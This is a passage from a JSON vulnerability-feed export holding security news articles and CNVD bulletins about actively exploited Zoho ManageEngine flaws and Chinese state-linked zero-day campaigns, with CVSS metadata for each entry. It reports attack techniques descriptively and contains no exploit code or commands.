wild after public disclosure of a flaw, stating that while zero-day attacks are initially limited in scope, they tend to be swiftly adopted by other threat actors, leading to indiscriminate probing events before the patches are installed.\n\nIt further accused Chinese state-sponsored groups of being \"particularly proficient\" at discovering and developing zero-day exploits.\n\n[![0-Day Vulnerabilities](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj2Fv84B8E1NDduixEzAgNyU-RvvdpVt2eY23UON-dCns8KnaaAn-rqjv_Tihoscf0lzJzcswmhacAZgW8Jdh82sqVfWIDHVa5zBDWPlh_uT7dLVU8BmoLqbWxqL-deV3Ok2yZ8h76dqXIbZ3SIOJJND7p6ixLGZmV_q9RpnvhYkQ9ABNMKZOdjtetP/s728-e100/exploit.jpg>)\n\nThis has been compounded by the fact that the Cyberspace Administration of China (CAC) enacted a new [vulnerability reporting regulation](<https://thehackernews.com/2021/07/chinas-new-law-requires-researchers-to.html>) in September 2021 that requires security flaws to be reported to the government prior to them being shared with the product developers.\n\nRedmond further said the law could enable government-backed elements to stockpile and weaponize the reported bugs, resulting in the increased use of zero-days for espionage activities designed to advance China's economic and military interests.\n\n[![state-sponsored hackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjzThAws7Nwe2onkDTrV1eAUZuHoxUQmHQD89fb1AMyF95hzxM_bjDK2t9-CUBtPHmaWAaGh6oLRZRmlWELsneZ9fLS1yThyXWXTF3Vhb67iMNcw8AvGM2hLy535BKjYA6NJ8csrauUfJWp6VGl-g4LRpHIAsWQ1E7ev0MDFndlR4i_R0-xqgivOOTY/s728-e100/map.jpg>)\n\nSome of the vulnerabilities that were first exploited by Chinese actors before being picked up by other adversarial groups include -\n\n * [**CVE-2021-35211**](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>) (CVSS score: 10.0) - A remote code execution flaw in SolarWinds Serv-U Managed File Transfer Server and Serv-U Secure FTP software that was exploited by DEV-0322.\n * [**CVE-2021-40539**](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) (CVSS score: 9.8) - An authentication bypass flaw in Zoho ManageEngine ADSelfService Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-44077**](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) - An unauthenticated remote code execution flaw in Zoho ManageEngine ServiceDesk Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-42321**](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) (CVSS score: 8.8) - A remote code execution flaw in Microsoft Exchange Server that was exploited three days after it was revealed during the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) hacking contest on October 16-17, 2021.\n * [**CVE-2022-26134**](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) (CVSS score: 9.8) - An Object-Graph Navigation Language (OGNL) injection flaw in Atlassian Confluence that's likely to have been leveraged by a China-affiliated actor against an unnamed U.S. entity days before the flaw's disclosure on June 2.\n\nThe findings also come almost a month after CISA released a list of [top vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-279a>) weaponized by China-based actors since 2020 to steal intellectual property and develop access into sensitive networks.\n\n\"Zero-day vulnerabilities are a particularly effective means for initial exploitation and, once publicly exposed, vulnerabilities can be rapidly reused by other nation-state and criminal actors,\" the company said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-05T06:00:00", "type": "thn", "title": "Microsoft Warns of Uptick in Hackers Leveraging Publicly-Disclosed 0-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539", "CVE-2021-42321", "CVE-2021-44077", "CVE-2022-26134"], "modified": "2022-12-14T04:04:34", "id": "THN:FD9FEFEA9EB66115FF4BAECDD8C520CB", "href": "https://thehackernews.com/2022/11/microsoft-warns-of-uptick-in-hackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-12-21T14:43:15", "description": "Another Zoho ManageEngine zero-day vulnerability is under active attack from an APT group, this time looking to override legitimate functions of servers running ManageEngine Desktop Central and elevate privileges \u2014 with an ultimate goal of dropping malware onto organizations\u2019 networks, the FBI has warned.\n\nAPT actors have been exploiting the bug, tracked as [CVE-2021-44515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44515>), since at least late October, the feds revealed in an [FBI Flash alert](<https://www.ic3.gov/Media/News/2021/211220.pdf>) released last week. There is also evidence to support that it\u2019s being used in an attack chain with two other Zoho bugs that researchers have observed under attack since September, according to the alert.\n\nThe latest vulnerability is an authentication-bypass vulnerability in ManageEngine Desktop Central that can allow an attacker to execute arbitrary code in the Desktop Central server, according to a Zoho [advisory](<https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>) that addressed the issue, published earlier this month.\n\nIndeed, the feds said they observed APT actors doing exactly that. More specifically, researchers observed attackers \u201ccompromising Desktop Central servers, dropping a webshell that overrides a legitimate function of Desktop Central, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials,\u201d according to the Flash Alert.\n\nZoho has addressed the vulnerability and is urging organizations to update to the appropriate latest builds of ManageEngine Desktop Central due to \u201cindications of exploitation,\u201d the company said in its advisory.\n\nSpecifically, the company is advising enterprise customers who have builds10.1.2127.17 and below deployed to upgrade to build [10.1.2127.18](<https://downloads.zohocorp.com/dnd/Desktop_Central/vSfr4V3f7NXjEJK/ManageEngine_Desktop_Central_10_1_0_SP-2127_18.ppm>); and those using builds 10.1.2128.0 to 10.1.2137.2 to upgrade to build [10.1.2137.3](<https://downloads.zohocorp.com/dnd/Desktop_Central/5fbkfifZFuh9mVx/ManageEngine_Desktop_Central_10_1_0_SP-2137_3.ppm>).\n\n## **Zoho Under Fire**\n\nThe bug is the third zero-day under active attack that researchers have discovered in the cloud platform company\u2019s ManageEngine suite since September, spurring dire warnings from the FBI and researchers alike.\n\nThough no one has yet conclusively identified the APT responsible, it\u2019s likely the attacks are linked and those responsible are from China, previous evidence has shown.\n\nEarlier this month, researchers at Palo Alto Networks Unit 42 [revealed](<https://threatpost.com/threat-group-takes-aim-again-at-cloud-platform-provider-zoho/176732/>) that state-backed adversaries were using vulnerable versions of ManageEngine ServiceDesk Plus to target a number of U.S. organizations between late October and November.\n\nThe attacks were related to a bug revealed in a Nov. 22 [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) by Zoho alerting customers of active exploitation against newly registered [CVE-2021-44077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077>) found in Manage Engine ServiceDesk Plus. The vulnerability, which allows for unauthenticated remote code execution, impacts ServiceDesk Plus versions 11305 and below.\n\nThat news came on the heels of [warnings](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September by the FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) that an unspecified APT was exploiting a then-zero-day vulnerability in Zoho ManageEngine\u2019s password management solution called ADSelfService Plus.\n\nZoho issued [a fix](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) for the vulnerability, tracked as [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>), soon after; still, researchers observed attackers [exploiting it](<https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/>) later in November in their continued assault on defense, energy and healthcare organizations.\n\nUnit 42 researchers combined the two previously known active attack fronts against Zoho\u2019s ManageEngine as the [\u201cTitledTemple\u201d](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>) campaign, and said earlier this month that there is evidence to link the APT responsible to China, although it is not conclusive.\n\nThe latest Flash Alert released by the FBI also shows a correlation between earlier APT attacks on ManageEngine and AdSelfService Plus, with malicious samples of code observed in the latest exploitation \u201cdownloaded from likely compromised ManageEngine \nADSelfService Plus servers,\u201d according to the alert.\n\n## **Inside the Exploitation **\n\nThose samples show initial exploitation of a Desktop Central API URL that allowed for an unauthenticated file upload of two different variants of webshells; the first variant was delivered using either the file name \u201cemsaler.zip\u201d or \u201ceco-inflect.jar\u201d in late October and mid-November, respectively; and a second variant using the file name \u201caaa.zip\u201d in late November.\n\nThe webshell overrides the legitimate Desktop Central API servlet endpoint, \u201c/fos/statuscheck,\u201d and either filters inbound GET in the case of the second variant, or POST requests in the case of the first variant, to that URL path, according to the FBI. It then allows attackers to execute commands as the SYSTEM user with elevated privileges if the inbound requests pass the filter check.\n\nThe webshell allows attackers to conduct initial reconnaissance and domain enumeration, after which the actors use BITSAdmin to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe, according to the FBI. Attackers then sideload the dropper through AppLaunch execution, creating a persistent service to execute the AppLaunch binary moving forward.\n\n\u201cUpon execution, the dropper creates an instance of svchost and injects code with RAT-like functionality that initiates a connection to a command and control server,\u201d according to the FBI.\n\nThreat actors conduct follow-on intrusion activity through the RAT, including attempted lateral movement to domain controllers and credential dumping techniques using Mimikatz, comsvcs.dll LSASS process memory dumping, and a WDigest downgrade attack with subsequent LSASS dumping through pwdump, researchers observed.\n\nThe FBI Flash Alert includes a detailed list of indicators of compromise so organizations using Zoho\u2019s ManageEngine Desktop Central can check to see if they are at risk or have been a victim of attack.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-21T14:42:02", "type": "threatpost", "title": "FBI: Another Zoho ManageEngine Zero-Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-21T14:42:02", "id": "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "href": "https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-03T13:20:27", "description": "State-backed adversaries expanded attacks against cloud platform company [Zoho and its ManageEngine](<https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/>) ServiceDesk Plus software, a help desk and asset management solution. A recent campaign marks an uptick in attacks against the firm\u2019s platform, which have also included past targeting of Zoho\u2019s ADSelfService Plus.\n\nThis most recent campaign, reported by [Palo Alto Networks Unit 42 this week](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>), dovetails warnings in September by the FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) of similar attacks. That targeting included an unspecified APT exploiting a then zero-day vulnerability in Zoho\u2019s password management solution called ADSelfService Plus.\n\nIn the Unit 42 report, authored by Robert Falcone and Peter Renals, researchers said the most recent activity was tracked between late October and November. During that time, attackers began reconnaissance efforts against a U.S. financial organization running a vulnerable version of ManageEngine ServiceDesk Plus, they wrote.\n\n\u201cIn the days that followed, we observed similar activity across six other organizations, with exploitation against one U.S. defense organization and one tech organization beginning as early as Nov. 3,\u201d researchers said.\n\nUnit 42 is now tracking the two active attack fronts against Zoho\u2019s ManageEngine as the \u201cTitledTemple\u201d campaign and have evidence to believe that the attackers are from China, though \u201cattribution is still ongoing,\u201d the researchers said.\n\nBack in November, Unit 42 said it observed correlations between the tactics and tooling used in ADSelfService Plus campaigns and Threat Group 3390, also known as TG-3390 and Emissary Panda or APT27.\n\nFindings by Microsoft Threat Intelligence Center\u2019s (MSTIC) tied the September Zoho attacks targeting its ManageEngine ADSelfService Plus also suspect threat actor DEV-0322 is behind the campaign. The advanced persistent threat group operates out of China, according Microsoft threat researchers.\n\n## **Unpatched ServiceDesk Plus Installs Under Attack**\n\nOn Nov. 22, Zoho released a [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) alerting customers of active exploitation against newly registered [CVE-2021-44077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077>) found in Manage Engine ServiceDesk Plus, a help desk and asset management software.\n\nThe vulnerability, which allows for unauthenticated remote code execution, impacts ServiceDesk Plus versions 11305 and below. Unit 42 researchers believe that attackers have been exploiting this bug in unpatched versions, though they have not found any publicly available proof of concept code for an exploit.\n\nResearchers also have observed the APT uploading a new dropper to the victim systems that, similar to the ADSelfService attacks, deploys a Godzilla webshell, they said. This \u201cprovides the actor with further access to and persistence in compromised systems,\u201d researchers said.\n\nHowever, though attackers used the same webshell secret key \u2013 5670ebd1f8f3f716 \u2013 in both TiltedTemple attacks, the Godzilla webshell used in the ServiceDesk Plus attack observed by researchers was not a single Java Server Pages (JSP) file, which was seen before.\n\nInstead, the webshell was installed as an Apache Tomcat Java Servlet Filter, which allow for the filtering of inbound requests or outbound responses. \u201cIn this particular case, this allows the actor to filter inbound requests to determine which requests are meant for the webshell,\u201d researchers explained.\n\n\u201cIt appears that the threat actor leveraged publicly available [code](<https://github.com/Scorpio-m7/tomcat-backdoor>) called tomcat-backdoor to build the filter and then added a modified Godzilla webshell to it,\u201d researchers wrote, adding that the use of a publicly available tool with documentation written in Chinese fits in with the profile of the actor that researchers already had observed.\n\nThis change also signifies a couple of things for the tactic used in the attacks, they said. The fact that the Godzilla webshell is installed as a filter means that there is no specific URL that the actor will send their requests to when interacting with the webshell, researchers explained. Additionally, the Godzilla webshell filter also can bypass a security filter that is present in ServiceDesk Plus to stop access to webshell files, they said.\n\n## **Over Half of Internet-Connected Installs Vulnerable**\n\nResearchers used Xpanse capabilities to discover the scope of the problem, finding that there are currently more than 4,700 internet-facing instances of ServiceDesk Plus globally, with 2,900, or 62 percent, vulnerable to exploitation.\n\n\u201cIn light of these recent developments, we would advance our characterization of the threat to that of an APT(s) conducting a persistent campaign, and leveraging a variety of initial access vectors, to compromise a diverse set of targets globally,\u201d researchers wrote.\n\nSo far, organizations that have been attacked comprise multiple sectors, including technology, energy, healthcare, education, finance and defense industries. Of four new victims since the originally discovered campaign\u2014which targeted nine organizations\u2013two were compromised through vulnerable ADSelfService Plus servers while two were compromised through ServiceDesk Plus software, they said.\n\n\u201cWe anticipate that this number will climb as the actor continues to conduct reconnaissance activities against these industries and others, including infrastructure associated with five U.S. states,\u201d researchers warned.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-03T13:17:47", "type": "threatpost", "title": "Threat Group Takes Aim Again at Cloud Platform Provider Zoho", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2021-12-03T13:17:47", "id": "THREATPOST:81CC7A43B010B785FD5977FBA1043E11", "href": "https://threatpost.com/threat-group-takes-aim-again-at-cloud-platform-provider-zoho/176732/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-18T16:16:07", "description": "A critical security vulnerability in the Zoho ManageEngine Desktop Central and Desktop Central MSP platforms could allow authentication bypass, the company has warned.\n\nThe bug (CVE-2021-44757) could allow a remote user to \u201cperform unauthorized actions in the server,\u201d according to the company\u2019s Monday [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>). \u201cIf exploited, this vulnerability may allow an attacker to read unauthorized data or write an arbitrary .ZIP file on the server.\u201d\n\nZoho\u2019s ManageEngine Desktop Central is a unified endpoint management (UEM) solution that lets IT admins manage servers, laptops, desktops, smartphones and tablets from a central location. Users can automate routines like installing patches, deploying software, imaging and deploying OS, according to the company\u2019s [documentation.](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) It can also be used to manage assets and software licenses, monitor software-usage statistics, manage USB device usage, take control of remote desktops, and more.\n\nOn the mobile side, users can deploy profiles and policies; configure devices for Wi-Fi, VPNs, email accounts and so on; apply restrictions on application installs, camera usage and the browser; and manage security with passcodes and remote lock/wipe functionality.\n\nAs such, the platform offers far-reaching access into the guts of an organization\u2019s IT footprint, making for an information-disclosure nightmare in the case of an exploit, potentially. As well, the [ability to install a .ZIP file](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) paves the way for the installation of malware on all of the endpoints managed by the Desktop Central instance.\n\nIn the case of the MSP version \u2013 which, as its name suggests, allows managed service providers (MSPs) to offer endpoint management to their own customers \u2013 the bug could be used in a [supply-chain attack](<https://threatpost.com/kaseya-attack-fallout/167541/>). Cybercriminals can simply compromise one MSP\u2019s Desktop Central MSP edition and potentially gain access to the customers whose footprints are being managed using it, depending on security measures the provider has put in place.\n\nZoho ManageEngine [released a Knowledge Base entry detailing patches](<https://www.manageengine.com/products/desktop-central/cve-2021-44757.html>) on Monday, and users are encouraged to update to the latest build in order to protect themselves. The firm also offered tips for general hardening of Desktop Central environments in the KB article.\n\n## **Zoho ManageEngine: Popular for Zero-Day Attacks**\n\nThe company didn\u2019t say whether the bug has been under attack as a zero-day vulnerability, but it\u2019s a good bet that cyberattackers will start targeting it for exploit if they haven\u2019t already. The ManageEngine platform is a popular one for attackers, given its all-seeing nature.\n\nThis played out in September, for instance, when a critical security vulnerability (CVE-2021-40539) in the Zoho ManageEngine ADSelfService Plus platform was patched; it could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts. But it was [under active attack](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) even before it was fixed, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nIn December, the FBI even went so far as to issue [an official alert](<https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/>) after a Zoho ManageEngine zero-day vulnerability was found to be under active attack from an advanced persistent threat (APT) group. That bug (CVE-2021-44515) could allow remote attackers to override legitimate functions of servers running ManageEngine Desktop Central and to elevate privileges \u2013 with an ultimate goal of dropping malware onto organizations\u2019 networks.\n\n**_Password_**_ _**_Reset: _****_[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-18T15:44:21", "type": "threatpost", "title": "Critical ManageEngine Desktop Server Bug Opens Orgs to Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44515", "CVE-2021-44757"], "modified": "2022-01-18T15:44:21", "id": "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "href": "https://threatpost.com/critical-manageengine-desktop-server-bug-malware/177705/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cnvd": [{"lastseen": "2022-11-05T07:01:33", "description": "Zoho ManageEngine SupportCenter Plus is a customer service support management software from ZOHO, Inc. The software provides help desk, customer management, service level management and tracking of customer requests.An authorization issue vulnerability exists in Zoho ManageEngine SupportCenter Plus, which is due to an error in the handling of authentication requests. A remote attacker could use this vulnerability to bypass the authentication process and gain unauthorized access to the application.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "cnvd", "title": "Zoho ManageEngine SupportCenter Plus Licensing Issue Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44526"], "modified": "2022-01-20T00:00:00", "id": "CNVD-2022-05445", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-05445", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-05T07:01:28", "description": "ZOHO ManageEngine Desktop Central MSP is a suite of desktop and mobile device management software for MSPs (managed service providers) from ZOHO. The software enables MSPs to remotely manage desktops, servers, and mobile devices in their customer networks and provides differentiated management services for organizations of all sizes.An authorization issue vulnerability exists in Zoho ManageEngine Desktop Central MSP, which stems from an error in the handling of authentication requests. A remote attacker could exploit this vulnerability to bypass the authentication process and execute arbitrary code on the Desktop Central MSP server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "cnvd", "title": "Zoho ManageEngine Desktop Central MSP Licensing Issue Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-01-20T00:00:00", "id": "CNVD-2022-05446", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-05446", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-05T08:06:38", "description": "ZOHO ManageEngine ServiceDesk Plus (SDP) is a set of ITIL-based IT service management software from ZOHO, Inc. The software integrates incident management, issue management, asset management IT project management, procurement and contract management, etc. A remote code execution vulnerability exists in ZOHO ManageEngine ServiceDesk Plus, which can be exploited by unauthenticated attackers to remotely execute code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-30T00:00:00", "type": "cnvd", "title": "ZOHO ManageEngine ServiceDesk Plus Remote Code Execution Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077"], "modified": "2021-12-13T00:00:00", "id": 